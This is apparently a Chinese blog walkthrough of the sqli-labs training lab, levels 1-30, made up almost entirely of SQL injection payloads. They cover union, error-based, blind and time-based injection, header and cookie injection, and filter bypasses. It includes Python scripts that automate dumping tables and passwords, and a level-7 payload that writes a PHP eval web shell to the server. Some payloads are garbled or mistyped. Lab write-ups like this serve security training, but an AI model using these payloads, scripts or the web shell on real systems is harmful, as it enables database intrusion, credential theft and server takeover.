sql-labs手注wp 1-30

发布于 2021-12-20  2880 次阅读


sql-labs注入

第一关('单引号注释)

http://127.0.0.1/sqli/Less-1/?id=-1'union select 1,database() ,3 -- - 爆库

http://127.0.0.1/sqli/Less-1/?id=-1'union select 1,group_concat(table_name) ,3 from information_schema.tables where table_schema=database()-- - 爆表

http://127.0.0.1/sqli/Less-1/?id=-1'union select 1,group_concat(column_name) ,3 from information_schema.columns where table_name='users' and table_schema=database()-- - 爆字段

http://127.0.0.1/sqli/Less-1/?id=-1'union select 1,group_concat(id,username,password) ,3 from security.users -- - 爆字段

第二关(数字型注入,无闭合符)

http://127.0.0.1/sqli/Less-2/?id=-1 union select 1,2,3-- -

第三关(‘)绕过)

http://127.0.0.1/sqli/Less-3/?id=-1') union select 1,2,3-- -

第四关(")绕过)

http://127.0.0.1/sqli/Less-4/?id=-1") union select 1,2,3-- -

第五关(二次查询'单引号floor报错注入最长64字符)

wp:尝试出现各种页面,发现没有回显,输入'发现报错,使用报错注入

刘子璇版(https://blog.csdn.net/qq_43573676/article/details/105774162

?id=1' union select 1,count(*),concat(0x7e,(select database()),0x7e,floor(rand(0)*2))as text from information_schema.tables group by test-- -爆库

?id=1' union select 1,count(*),concat(0x7e,(select column_name from information_schema.columns where table_name='users' limit0,1),0x7e,floor(rand(0)*2))as text from information_schema.tables group by test-- -爆表

?id=1' union select 1,count(*),concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit0,1),0x7e,floor(rand(0)*2))as text from information_schema.tables group by test-- -爆字段

?id=1' union select 1,count(*),concat(0x7e,(select password from users limit0,1),0x7e,floor(rand(0)*2))as text from information_schema.tables group by test-- -爆密码

and (select 1 from (select count(),concat(( payload),floor (rand(0)2))x from

徐博文版

information_schema.tables group by x)a)语句的构建

?id=2' and (select 1 from (select count(),concat(((select concat(database(),';'))),floor (rand(0)2))x from information_schema.tables group by x)a) -- - 当前数据库

?id=2' and (select 1 from (select count(),concat(((select concat(table_name,';') from information_schema.tables where table_schema='security' limit 0,1)),floor (rand(0)2))x from information_schema.tables group by x)a) -- -当前数据库的表

?id=2' and (select 1 from (select count(),concat(((select concat(column_name,';') from information_schema.columns where table_name='users' limit 5,1)),floor (rand(0)2))x from information_schema.tables group by x)a) -- - 爆列名

15-17

?id=2' and (select 1 from (select count(),concat(((select concat(password,';') from users limit 0,1)),floor (rand(0)2))x from information_schema.tables group by x)a) -- -爆内容

相关知识

  • count():汇总数据函数

  • rand():随机输出一个小于1的正数

  • floor():把输出的结果取整

  • group by语句:把结果分组输出

  • concat():连接两条语句

  • 十种MySQL报错注入 - 我擦咧什么鬼 - 博客园 (cnblogs.com)
  • concat mysql sql注入_SQL注入之MySQL报错注入整理_weixin_39908758的博客-CSDN博客
  • 脚本

    import requests from bs4 import BeautifulSoup db_name = '' table_list = [] column_list = [] url = '''http://192.168.1.113:86/Less-5/?id=1'''

    获取当前数据库名

    print('当前数据库名:') payload = '''' and 1=(select count() from information_schema.columns group by concat(0x3a,(select database()),0x3a,floor(rand(0)2)))--+''' r = requests.get(url+payload) db_name = r.text.split(':')[-2] print('[+]' + db_name)

    获取表名

    print('数据库%s下的表名:' % db_name) for i in range(50): payload = '''' and 1=(select count() from information_schema.columns group by concat(0x3a,(select table_name from information_schema.tables where table_schema='%s' limit %d,1),0x3a,floor(rand(0)2)))--+''' % (db_name,i) r = requests.get(url+payload) if 'group_key' not in r.text: break table_name = r.text.split(':')[-2] table_list.append(table_name) print('[+]' + table_name)

    获取列名
    这里以users表为例

    print('%s表下的列名:' % table_list[-1]) for i in range(50): payload = '''' and 1=(select count() from information_schema.columns group by concat(0x3a,(select column_name from information_schema.columns where table_name='%s' limit %d,1),0x3a,floor(rand(0)2)))--+''' % (table_list[-1],i) r = requests.get(url + payload) if 'group_key' not in r.text: break column_name = r.text.split(':')[-2] column_list.append(column_name) print('[+]' + column_name)

    获取字段值
    这里以username列为例

    print('%s列下的字段值:' % column_list[-2]) for i in range(50): payload = '''' and 1=(select count() from information_schema.columns group by concat(0x3a,(select %s from %s.%s limit %d,1),0x3a,floor(rand(0)2)))--+''' % (column_list[-2],db_name,table_list[-1],i) r = requests.get(url + payload) if 'group_key' not in r.text: break dump = r.text.split(':')[-2] print('[+]' + dump)

第六关("双引号floor报错注入最长64字符)

?id=2” and (select 1 from (select count(),concat(((select concat(database(),';'))),floor (rand(0)2))x from information_schema.tables group by x)a) -- - 当前数据库

第七关('))out file存储)

Less-7/?id=-1’)) and 1=2 union slect 1,"<?php @eval($_POST['cmd']);?>",3 into outfile ‘outcome.php’–- - 文件默认在@@datadir显示的数据库的当前库的根目录下

?id=-1')) union select 1,"<?php @eval($_POST['cmd']);?>",3 into outfile "C:\\phpStudy\\PHPTutorial\\WWW\\123456.php" -- - 也可以自定义路径,这里转义了\,需要\\来表示\

相关知识

1.mysql.ini中 添加secure_file_priv=""

secure_file_prive=null ––限制mysqld 不允许导入导出

secure_file_priv=/path/ – --限制mysqld的导入导出只能发生在默认的/path/目录下

secure_file_priv="" – --不对mysqld 的导入 导出做限制

2.因为第七关没有回显,所有利用第一关查看路径,和secure_file_priv情况

/Less-1/?id=-1’ union select 1,@@datadir,@@secure_file_priv-- -

@@datadir函数查看MySql存放数据文件的目录也就是,mysql的data目录路径

@@secure_file_priv函数查看权限

3.into outfile函数使用的前提是,已知一个拥有写入和执行权限的目录文件夹
4.into outfile 将查询结果写入文件里

5.MySQL中的basedir和datadir的作用

(16条消息) MySQL中的basedir和datadir的作用wolfalcon的专栏-CSDN博客basedir

第八关(’单引号字符型注入,也可以布尔和时间盲注)

id=1'and ascii(substring(database(),1,1))=115--+

第九关('单引号睡眠注入)

尝试了下各种姿势发现都是一个回显,我们可以用睡眠注入

?id=1' and If(ascii(substr(database(),1,1))=115,1,sleep(5))-- -

(编码(截取(当前数据库),从第一个字母开始,截取一个 ))如果成立立即显示,否则睡眠(转)5秒显示

sleep(if(length(database())=8,0,5))-- - 如果数据库长度=8,不睡,否则睡5秒。

if(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1)='a',sleep(5),1) -- - a为尝试的数字,爆表名

?id=-1' union select 1,2,group_concat(concat_ws("-",username,password)) from users-- -

相关知识

import requests import time flag = '' table="abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890_{}" while True: for i in table: ss = time.time() data = { 'datebase':'''ELT(left((SELECT schema_name FROM information_schema.schemata limit 0,1),{})='{}{}',SLEEP(2))'''.format(len(flag)+1,flag, i), 'table':'''ELT(left((SELECT TABLE_NAME FROM information_schema.tables WHERE TABLE_SCHEMA="ctftraining" limit 0,1),{})='{}{}',SLEEP(2))'''.format(len(flag)+1,flag, i), 'column':'''ELT(left((SELECT column_name FROM information_schema.columns WHERE table_name = 'flag' limit 0,1),{})='{}{}',SLEEP(2))'''.format(len(flag)+1,flag, i), 'flag':'''ELT(left((SELECT flag FROM ctftraining.flag limit 0,1),{})='{}{}',SLEEP(5))'''.format(len(flag)+1,flag, i), } #url="http://e40ffbdc-1bae-4621-a7c4-4326289ff1d6.node1.buuoj.cn/Less-8/?id=1%27 union select 1,1,("+data['datebase']+")--+" 查找数据库 #url="http://e40ffbdc-1bae-4621-a7c4-4326289ff1d6.node1.buuoj.cn/Less-8/?id=1%27 union select 1,1,("+data['table']+")--+" 查表名 #url="http://e40ffbdc-1bae-4621-a7c4-4326289ff1d6.node1.buuoj.cn/Less-8/?id=1%27 union select 1,1,("+data['column']+")--+" 查字段名 url="http://e40ffbdc-1bae-4621-a7c4-4326289ff1d6.node1.buuoj.cn/Less-8/?id=1%27 union select 1,1,("+data['flag']+")--+" #查数据 t=requests.get(url)

    if time.time()-ss>=4:
        flag += i
        print (flag)

第十关("双引号睡眠注入)

?id=1" and If(ascii(substr(database(),2,1))=101,1,sleep(5))-- -

第十一关(post'注入)

uname=0' union select 1,database()-- -&passwd=123&submit=Submit

第十二关(POST ")注入)

uname=123")union select 1,database()-- -&passwd=123&submit=Submit

第十三关(post')报错注入)

sqli-labs第十三关--十五关_小人物的博客-CSDN博客

uname=123') union select count(),concat(0x7e,(select database()),0x7e,floor(rand()2))as a from information_schema.tables group by a -- -&passwd=123')or 1-- -&submit=Submit 至于为什么不能') "-- -闭合运行我也不知道

第十四关(基于"的post"报错注入)

uname=123"union select count(),concat(0x7e,(select database()),0x7e,floor(rand()2))as a from information_schema.tables group by a -- - &passwd=123"or 1-- -&submit=Submit

第十五关(基于‘的post‘布尔盲注)(dns注入)

uname=123' or (length(database())) = 8-- -&passwd=123'-- -&submit=Submit

第十六关(基于'的post")睡眠盲注)(dns注入)

1") and If(ascii(substr(database(),1,1))=115,sleep(5),1)#

第十七关(基于'的密码报错注入)

sqli-labs-master第17关_m_ing-CSDN博客

传入合法时,修改

admb’ or extractvalue(1,concat(0x7e,(select database())))#

uname=admin&passwd=1' and (select 1 from (select count(),concat((SELECT schema_name FROM information_schema.schemata limit 0,1),floor (rand(0)2))x from information_schema.tables group by x)a) #

第十八关(基于'的post'User-Agent头注入)adminadmin登录

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93 'or updatexml(1,concat(0x7e,(database()),0x7e),1) or '1

第十九关(基于'的post'Referer头注入)adminadmin登录

Referer: http://127.0.0.1/sqli/Less-19/'or updatexml(1,concat(0x7e,(database()),0x7e),1) or '1

第二十关(基于'的post'cookie头报错注入)adminadmin登录

Cookie: uname=admin'or updatexml(1,concat(0x7e,(database()),0x7e),1) or '1

第二十一关(基于’)字符型的post'cookie头base64加密注入)adminadmin

')union select 1,2,database()-- -没成功

Cookie: uname=YWRtaW4nb3IgdXBkYXRleG1sKDEsY29uY2F0KDB4N2UsKGRhdGFiYXNlKCkpLDB4N2UpLDEpIG9yICcx报错注入姿势过

第二十二关(基于"的cookie编码base64注入)

uname=" union select 1,2,3# ;

Cookie: uname=IiB1bmlvbiBzZWxlY3QgMSwyLDMjIDs=

第二十三关(过滤注释的GET型注入)

id=-1' union select 1,2,3 ='1

第二十四关(二次注入)

知道admin用户存在但不知道密码

点击New User click here?注册admin'-- -       123456

登录admin   密码为123456

第二十五关(过滤or和and的单引号注入)

?id=-1' union select 1,2,3-- -

第二十六关(基于’过滤注释和空格的注入)

?id=-1'aandnd(updatexml(1,@@datadir,1))anandd'1'='1

第二十七关(基于’过滤union、select与注释和空格的注入)

?id=1'and(updatexml(1,@@datadir,1))and'1'='1

第二十八关(基于’)过滤union和select等的盲注)

id=111') UnIon All Select ('1'),2,('3       url编码

?id=111%27)%0AUnIon%0AAll%0ASelect%0A(%271%27),2,(%273

第二十九关(index.php——基于单引号字符型的注入)

index.php?id=-1' union select 1,2,3 -- -

login.php——基于单引号的参数污染绕过

login.php?id=1&id=-1' union select 1,2,3 -- -

第三十关(index.php——基于双引号字符型的注入)

?id=-1" union select 1,2,3 -- -

login.php——基于双引号的参数污染绕过

login.php?id=1&id=-1" union select 1,2,3 -- -

参考链接:mysql-injection.pdf

(16条消息) sqli-labs注入——sqli-labs的1-65关闯关指南_lacryma5555的博客-CSDN博客

(16条消息) SQL注入篇——sqli-labs最详细1-40闯关指南_爱国小白帽-CSDN博客_sql注入闯关

SQL手动注入 - 简书 (jianshu.com)

子夜不哭
最后更新于 2021-12-20